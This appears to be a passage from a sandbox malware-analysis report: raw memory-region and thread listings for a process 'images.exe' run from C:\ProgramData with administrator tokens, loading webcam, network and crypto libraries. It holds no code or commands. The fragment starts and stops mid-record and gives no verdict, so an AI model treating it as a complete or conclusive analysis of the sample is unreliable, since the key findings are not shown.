"\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1211 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1212 start_va = 0x4b0000 end_va = 0x4b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1213 start_va = 0x2c50000 end_va = 0x2d2cfff monitored = 0 entry_point = 0x2cae0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1214 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1215 start_va = 0x2c50000 end_va = 0x2d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 1216 start_va = 0x2d50000 end_va = 0x2f4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d50000" filename = "" Thread: id = 17 os_tid = 0xdc8 Thread: id = 18 os_tid = 0xdd4 Thread: id = 20 os_tid = 0xde0 Thread: id = 22 os_tid = 0xde8 Process: id = "7" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0x79640000" os_pid = "0xdd8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "modified_file" parent_id = "1" os_parent_pid = "0xd80" cmd_line = "\"C:\\ProgramData\\images.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1101 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1102 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1103 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1104 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1105 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1106 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1107 start_va = 0x400000 end_va = 0x555fff monitored = 1 entry_point = 0x553b50 region_type = mapped_file name = "images.exe" filename = "\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe") Region: id = 1108 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1109 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1110 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1111 start_va = 0x7fff0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1112 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1113 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 1114 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1115 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1116 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1117 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1118 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1119 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1120 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1121 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1122 start_va = 0x560000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1130 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1131 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1132 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1133 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1134 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1135 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1136 start_va = 0x743e0000 end_va = 0x74471fff monitored = 0 entry_point = 0x74420380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1137 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1138 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1149 start_va = 0x75830000 end_va = 0x758aafff monitored = 0 entry_point = 0x7584e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1150 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1151 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1152 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1153 start_va = 0x75680000 end_va = 0x756c3fff monitored = 0 entry_point = 0x75699d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1154 start_va = 0x753a0000 end_va = 0x7544cfff monitored = 0 entry_point = 0x753b4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1155 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1156 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1157 start_va = 0x75580000 end_va = 0x755d7fff monitored = 0 entry_point = 0x755c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1158 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1159 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1160 start_va = 0x77660000 end_va = 0x7774afff monitored = 0 entry_point = 0x7769d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1161 start_va = 0x77480000 end_va = 0x7763cfff monitored = 0 entry_point = 0x77562a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1162 start_va = 0x755e0000 end_va = 0x75671fff monitored = 0 entry_point = 0x75618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1163 start_va = 0x75c70000 end_va = 0x7706efff monitored = 0 entry_point = 0x75e2b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1166 start_va = 0x74820000 end_va = 0x74856fff monitored = 0 entry_point = 0x74823b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1167 start_va = 0x74d70000 end_va = 0x75268fff monitored = 0 entry_point = 0x74f77610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1168 start_va = 0x74860000 end_va = 0x748a4fff monitored = 0 entry_point = 0x7487de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1169 start_va = 0x75510000 end_va = 0x7551bfff monitored = 0 entry_point = 0x75513930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1170 start_va = 0x75910000 end_va = 0x7599cfff monitored = 0 entry_point = 0x75959b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1171 start_va = 0x74640000 end_va = 0x74683fff monitored = 0 entry_point = 0x74647410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1172 start_va = 0x74630000 end_va = 0x7463efff monitored = 0 entry_point = 0x74632e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1173 start_va = 0x910000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 1174 start_va = 0x660000 end_va = 0x689fff monitored = 0 entry_point = 0x665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1175 start_va = 0xa70000 end_va = 0xbf7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 1176 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1178 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1179 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1180 start_va = 0xc00000 end_va = 0xd80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 1181 start_va = 0xd90000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 1206 start_va = 0x71d30000 end_va = 0x71da4fff monitored = 0 entry_point = 0x71d69a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1207 start_va = 0x2190000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1227 start_va = 0x2340000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1228 start_va = 0x2190000 end_va = 0x22e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1229 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1230 start_va = 0x74130000 end_va = 0x7414afff monitored = 0 entry_point = 0x74139050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1231 start_va = 0x71e40000 end_va = 0x71fbdfff monitored = 0 entry_point = 0x71ebc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1232 start_va = 0x71ff0000 end_va = 0x722bafff monitored = 0 entry_point = 0x7222c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1233 start_va = 0x75520000 end_va = 0x7557efff monitored = 0 entry_point = 0x75524af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1234 start_va = 0x77640000 end_va = 0x77652fff monitored = 0 entry_point = 0x77641d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1235 start_va = 0x71e20000 end_va = 0x71e34fff monitored = 0 entry_point = 0x71e25210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1236 start_va = 0x74690000 end_va = 0x74807fff monitored = 0 entry_point = 0x746e8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1237 start_va = 0x75900000 end_va = 0x7590dfff monitored = 0 entry_point = 0x75905410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1238 start_va = 0x75820000 end_va = 0x75825fff monitored = 0 entry_point = 0x75821460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1239 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1240 start_va = 0x660000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1241 start_va = 0x910000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 1242 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1243 start_va = 0x75310000 end_va = 0x75393fff monitored = 0 entry_point = 0x75336220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1244 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1245 start_va = 0x71e00000 end_va = 0x71e14fff monitored = 0 entry_point = 0x71e0e570 region_type = mapped_file name = "devenum.dll" filename = "\\Windows\\SysWOW64\\devenum.dll" (normalized: "c:\\windows\\syswow64\\devenum.dll") Region: id = 1246 start_va = 0x71dd0000 end_va = 0x71df3fff monitored = 0 entry_point = 0x71dd4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1247 start_va = 0x71d00000 end_va = 0x71d22fff monitored = 0 entry_point = 0x71d08940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 1248 start_va = 0x6b0000 end_va = 0x6b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1249 start_va = 0x77070000 end_va = 0x7747afff monitored = 0 entry_point = 0x7709adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1250 start_va = 0x71cd0000 end_va = 0x71cf7fff monitored = 0 entry_point = 0x71cd7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1251 start_va = 0x72570000 end_va = 0x72591fff monitored = 0 entry_point = 0x725791f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1252 start_va = 0x758b0000 end_va = 0x758f1fff monitored = 0 entry_point = 0x758c6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1253 start_va = 0x71dc0000 end_va = 0x71dc8fff monitored = 0 entry_point = 0x71dc29b0 region_type = mapped_file name = "msdmo.dll" filename = "\\Windows\\SysWOW64\\msdmo.dll" (normalized: "c:\\windows\\syswow64\\msdmo.dll") Region: id = 1254 start_va = 0x71cb0000 end_va = 0x71cc3fff monitored = 0 entry_point = 0x71cbe190 region_type = mapped_file name = "avicap32.dll" filename = "\\Windows\\SysWOW64\\avicap32.dll" (normalized: "c:\\windows\\syswow64\\avicap32.dll") Region: id = 1255 start_va = 0x71c80000 end_va = 0x71ca2fff monitored = 0 entry_point = 0x71c933e0 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll") Region: id = 1256 start_va = 0x71be0000 end_va = 0x71c71fff monitored = 0 entry_point = 0x71bedd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1257 start_va = 0x2d40000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 1258 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1259 start_va = 0x2de0000 end_va = 0x2e9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002de0000" filename = "" Region: id = 1260 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1261 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1262 start_va = 0x6e0000 end_va = 0x6e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1263 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1264 start_va = 0x700000 end_va = 0x701fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui") Region: id = 1265 start_va = 0xa10000 end_va = 0xa12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "avicap32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\avicap32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\avicap32.dll.mui") Region: id = 1266 start_va = 0x2d40000 end_va = 0x2dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 1267 start_va = 0x2dd0000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 1268 start_va = 0xa20000 end_va = 0xa26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1269 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1270 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1271 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 1272 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 1273 start_va = 0xa50000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 1274 start_va = 0x22f0000 end_va = 0x22f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 1275 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1276 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1277 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1278 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1279 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1280 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 1281 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1282 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 1283 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1284 start_va = 0xa50000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 1285 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1286 start_va = 0x22f0000 end_va = 0x22f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 1287 start_va = 0x2ea0000 end_va = 0x31d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1288 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1289 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 1290 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1291 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1292 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1293 start_va = 0x2dc0000 end_va = 0x2dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 1294 start_va = 0x2dd0000 end_va = 0x2dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 1295 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1296 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1297 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1298 start_va = 0x2dc0000 end_va = 0x2dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 1299 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1300 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1301 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1302 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1303 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = 